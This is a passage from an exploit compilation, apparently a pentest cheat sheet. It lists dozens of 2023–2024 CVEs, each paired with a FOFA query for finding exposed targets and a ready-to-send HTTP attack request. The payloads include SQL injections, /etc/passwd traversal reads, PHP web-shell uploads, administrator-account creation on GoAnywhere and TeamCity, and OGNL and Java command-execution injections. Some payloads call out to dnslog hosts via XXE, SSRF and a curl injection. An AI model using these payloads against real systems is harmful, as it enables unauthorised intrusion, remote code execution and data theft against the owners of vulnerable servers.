Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value.
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command.
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"
configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"
jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png
----------767099171--

117. WordPress LayerSlider plugin SQL injection
version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php

119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328

File path: /upload/2.php

121. Byzoro (北京百绰智能) S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

File path: boot/web/upload/weblogo/1.php

122. Byzoro (北京百绰智能) S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded it reads: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

Uploaded file: http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user is created, log in to the admin backend directly; system commands can be executed from there.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected: Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin backend address: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 Cloud Mall (H5 云商城) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kirisun (科立讯) communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kirisun (科立讯) communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kirisun (科立讯) communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kirisun (科立讯) communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kirisun (科立讯) communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed (base64-encoded).
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
Affected:
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
